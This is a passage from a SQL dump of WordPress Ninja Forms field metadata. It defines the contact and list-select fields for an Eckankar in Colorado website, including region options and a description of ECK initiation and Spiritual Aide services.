Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8274,55,'field_label','First Name','field_label','First Name'),(8275,55,'field_key','textbox_94','field_key','textbox_94'),(8276,55,'value','','value',''),(8277,56,'field_label','Last Name','field_label','Last Name'),(8278,56,'field_key','lastname_95','field_key','lastname_95'),(8279,56,'value','','value',''),(8280,57,'field_label','Email','field_label','Email'),(8281,57,'field_key','email_96','field_key','email_96'),(1551,47,'key','listselect_85','key','listselect_85'),(1552,47,'container_class','one-half first','container_class','one-half first'),(1553,47,'parent_id','5','parent_id','5'),(1585,50,'objectType','Field','objectType','Field'),(1586,50,'objectDomain','fields','objectDomain','fields'),(1587,50,'editActive','','editActive',''),(1588,50,'order','7','order','7'),(1589,50,'type','listselect','type','listselect'),(1590,50,'label','Select The Person You Would Like To Contact','label','Select The Person You Would Like To Contact'),(1591,50,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(1592,50,'label_pos','above','label_pos','above'),(1593,50,'list_type','dropdown','list_type','dropdown'),(1594,50,'multi_size','5','multi_size','5'),(1595,50,'list_show_value','1','list_show_value','1'),(1596,50,'list','a:0:{}','list','a:0:{}'),(1597,50,'user_info_field_group','','user_info_field_group',''),(1598,50,'calc_auto_include','0','calc_auto_include','0'),(1599,50,'user_state','0','user_state','0'),(1600,50,'num_sort','0','num_sort','0'),(1601,50,'admin_label','','admin_label',''),(1602,50,'show_help','0','show_help','0'),(1603,50,'help_text','','help_text',''),(1604,50,'show_desc','0','show_desc','0'),(1605,50,'desc_pos','none','desc_pos','none'),(1606,50,'desc_text','','desc_text',''),(1607,50,'element_class','','element_class',''),(1608,50,'required','1','required','1'),(1609,50,'options','a:2:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:21:\"Initiator-Larry Dixon\";s:5:\"value\";s:21:\"Initiator-Larry Dixon\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:2:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:21:\"Initiator-Larry Dixon\";s:5:\"value\";s:21:\"Initiator-Larry Dixon\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8272,54,'field_label','Text','field_label','Text'),(8273,54,'field_key','html_93','field_key','html_93'),(1610,50,'key','select_the_person_you_would_like_to_contact_1613166999137','key','select_the_person_you_would_like_to_contact_1613166999137'),(1611,50,'container_class','one-half','container_class','one-half'),(1612,50,'parent_id','5','parent_id','5'),(1613,51,'objectType','Field','objectType','Field'),(1614,51,'objectDomain','fields','objectDomain','fields'),(1615,51,'editActive','','editActive',''),(1616,51,'order','8','order','8'),(1617,51,'type','textarea','type','textarea'),(1618,51,'label','Enter Your Message Here','label','Enter Your Message Here'),(1619,51,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(1620,51,'label_pos','above','label_pos','above'),(1621,51,'default_value','','default_value',''),(1622,51,'textarea_rte','0','textarea_rte','0'),(1623,51,'textarea_media','0','textarea_media','0'),(1624,51,'disable_rte_mobile','0','disable_rte_mobile','0'),(1625,51,'input_limit','','input_limit',''),(1626,51,'input_limit_type','char','input_limit_type','char'),(1627,51,'calc_auto_include','0','calc_auto_include','0'),(1628,51,'num_sort','0','num_sort','0'),(1629,51,'admin_label','','admin_label',''),(1630,51,'show_help','0','show_help','0'),(1631,51,'help_text','','help_text',''),(1632,51,'show_desc','0','show_desc','0'),(1633,51,'desc_pos','none','desc_pos','none'),(1634,51,'desc_text','','desc_text',''),(1635,51,'element_class','','element_class',''),(1636,51,'required','1','required','1'),(1637,51,'default','','default',''),(1638,51,'key','textarea_89','key','textarea_89'),(1639,51,'placeholder','','placeholder',''),(1640,51,'container_class','','container_class',''),(1641,51,'manual_key','','manual_key',''),(1642,51,'parent_id','5','parent_id','5'),(17039,599,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\r\nPlease Enter Your Information Below','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\r\nPlease Enter Your Information Below'),(17038,599,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(17037,599,'label','Text','label','Text'),(17036,599,'def_id','','def_id',''),(17035,599,'fav_id','','fav_id',''),(17034,599,'order','1','order','1'),(17033,599,'type','html','type','html'),(17032,599,'drawerDisabled','','drawerDisabled',''),(1660,53,'objectType','Field','objectType','Field'),(1661,53,'objectDomain','fields','objectDomain','fields'),(1662,53,'editActive','','editActive',''),(1663,53,'order','10','order','10'),(1664,53,'type','submit','type','submit'),(1665,53,'label','Submit','label','Submit'),(1666,53,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(1667,53,'show_help','0','show_help','0'),(1668,53,'help_text','','help_text',''),(1669,53,'show_desc','0','show_desc','0'),(1670,53,'desc_pos','none','desc_pos','none'),(1671,53,'desc_text','','desc_text',''),(1672,53,'processing_label','Processing','processing_label','Processing'),(1673,53,'element_class','','element_class',''),(1674,53,'key','submit_91','key','submit_91'),(1675,53,'container_class','','container_class',''),(1676,53,'parent_id','5','parent_id','5'),(1677,54,'objectType','Field','objectType','Field'),(1678,54,'objectDomain','fields','objectDomain','fields'),(1679,54,'editActive','','editActive',''),(1680,54,'order','1','order','1'),(1681,54,'type','html','type','html'),(1682,54,'label','Text','label','Text'),(1683,54,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(1684,54,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Boulder Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Boulder Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.'),(1685,54,'desc_el','div','desc_el','div'),(1686,54,'show_desc','0','show_desc','0'),(1687,54,'desc_pos','none','desc_pos','none'),(1688,54,'desc_text','','desc_text',''),(1689,54,'element_class','','element_class',''),(1690,54,'default','<p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Boulder Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','default','<p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Boulder Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>'),(1691,54,'key','html_93','key','html_93'),(1692,54,'container_class','','container_class',''),(1693,54,'drawerDisabled','','drawerDisabled',''),(1694,54,'parent_id','6','parent_id','6'),(1695,55,'objectType','Field','objectType','Field'),(1696,55,'objectDomain','fields','objectDomain','fields'),(1697,55,'editActive','','editActive',''),(1698,55,'order','2','order','2'),(1699,55,'type','textbox','type','textbox'),(1700,55,'def_id','6','def_id','6'),(1701,55,'label','First Name','label','First Name'),(1702,55,'label_pos','above','label_pos','above'),(1703,55,'mask','','mask',''),(1704,55,'datepicker','0','datepicker','0'),(1705,55,'first_name','1','first_name','1'),(1706,55,'last_name','0','last_name','0'),(1707,55,'from_name','0','from_name','0'),(1708,55,'user_info_field_group','1','user_info_field_group','1'),(1709,55,'show_help','0','show_help','0'),(1710,55,'help_text','','help_text',''),(1711,55,'calc_auto_include','0','calc_auto_include','0'),(1712,55,'calc_option','0','calc_option','0'),(1713,55,'placeholder','','placeholder',''),(1714,55,'user_address_1','','user_address_1',''),(1715,55,'user_address_2','','user_address_2',''),(1716,55,'user_city','','user_city',''),(1717,55,'user_zip','','user_zip',''),(1718,55,'user_phone','','user_phone',''),(1719,55,'user_email','','user_email',''),(1720,55,'disable_input','0','disable_input','0'),(1721,55,'input_limit','','input_limit',''),(1722,55,'input_limit_type','char','input_limit_type','char'),(1723,55,'input_limit_msg','','input_limit_msg',''),(1724,55,'user_state','0','user_state','0'),(1725,55,'autocomplete_off','0','autocomplete_off','0'),(1726,55,'num_sort','0','num_sort','0'),(1727,55,'admin_label','','admin_label',''),(1728,55,'user_info_field_group_name','','user_info_field_group_name',''),(1729,55,'user_info_field_group_custom','','user_info_field_group_custom',''),(1730,55,'show_desc','0','show_desc','0'),(1731,55,'desc_pos','none','desc_pos','none'),(1732,55,'desc_text','','desc_text',''),(1733,55,'element_class','','element_class',''),(1734,55,'required','1','required','1'),(1735,55,'key','textbox_94','key','textbox_94'),(1736,55,'default','','default',''),(1737,55,'container_class','one-half first','container_class','one-half first'),(1738,55,'manual_key','','manual_key',''),(1739,55,'custom_mask','','custom_mask',''),(1740,55,'custom_name_attribute','','custom_name_attribute',''),(1741,55,'personally_identifiable','','personally_identifiable',''),(1742,55,'parent_id','6','parent_id','6'),(1743,56,'objectType','Field','objectType','Field'),(1744,56,'objectDomain','fields','objectDomain','fields'),(1745,56,'editActive','','editActive',''),(1746,56,'order','3','order','3'),(1747,56,'type','lastname','type','lastname'),(1748,56,'def_id','7','def_id','7'),(1749,56,'label','Last Name','label','Last Name'),(1750,56,'label_pos','above','label_pos','above'),(1751,56,'mask','','mask',''),(1752,56,'datepicker','0','datepicker','0'),(1753,56,'first_name','0','first_name','0'),(1754,56,'from_name','0','from_name','0'),(1755,56,'user_info_field_group','1','user_info_field_group','1'),(1756,56,'show_help','0','show_help','0'),(1757,56,'help_text','','help_text',''),(1758,56,'calc_auto_include','0','calc_auto_include','0'),(1759,56,'calc_option','0','calc_option','0'),(1760,56,'placeholder','','placeholder',''),(1761,56,'user_address_1','','user_address_1',''),(1762,56,'user_address_2','','user_address_2',''),(1763,56,'user_city','','user_city',''),(1764,56,'user_zip','','user_zip',''),(1765,56,'user_phone','','user_phone',''),(1766,56,'user_email','','user_email',''),(1767,56,'disable_input','0','disable_input','0'),(1768,56,'input_limit','','input_limit',''),(1769,56,'input_limit_type','char','input_limit_type','char'),(1770,56,'input_limit_msg','','input_limit_msg',''),(1771,56,'user_state','0','user_state','0'),(1772,56,'autocomplete_off','0','autocomplete_off','0'),(1773,56,'num_sort','0','num_sort','0'),(1774,56,'admin_label','','admin_label',''),(1775,56,'user_info_field_group_name','','user_info_field_group_name',''),(1776,56,'user_info_field_group_custom','','user_info_field_group_custom',''),(1777,56,'show_desc','0','show_desc','0'),(1778,56,'desc_pos','none','desc_pos','none'),(1779,56,'desc_text','','desc_text',''),(1780,56,'element_class','','element_class',''),(1781,56,'required','1','required','1'),(1782,56,'key','lastname_95','key','lastname_95'),(1783,56,'default','','default',''),(1784,56,'container_class','one-half','container_class','one-half'),(1785,56,'custom_name_attribute','lname','custom_name_attribute','lname'),(1786,56,'personally_identifiable','1','personally_identifiable','1'),(1787,56,'parent_id','6','parent_id','6'),(1788,57,'objectType','Field','objectType','Field'),(1789,57,'objectDomain','fields','objectDomain','fields'),(1790,57,'editActive','','editActive',''),(1791,57,'order','4','order','4'),(1792,57,'type','email','type','email'),(1793,57,'def_id','14','def_id','14'),(1794,57,'label','Email','label','Email'),(1795,57,'label_pos','above','label_pos','above'),(1796,57,'mask','','mask',''),(1797,57,'datepicker','0','datepicker','0'),(1798,57,'first_name','0','first_name','0'),(1799,57,'last_name','0','last_name','0'),(1800,57,'from_name','0','from_name','0'),(1801,57,'user_address_1','0','user_address_1','0'),(1802,57,'user_address_2','0','user_address_2','0'),(1803,57,'user_city','0','user_city','0'),(1804,57,'user_zip','0','user_zip','0'),(1805,57,'user_phone','0','user_phone','0'),(1806,57,'user_info_field_group','1','user_info_field_group','1'),(1807,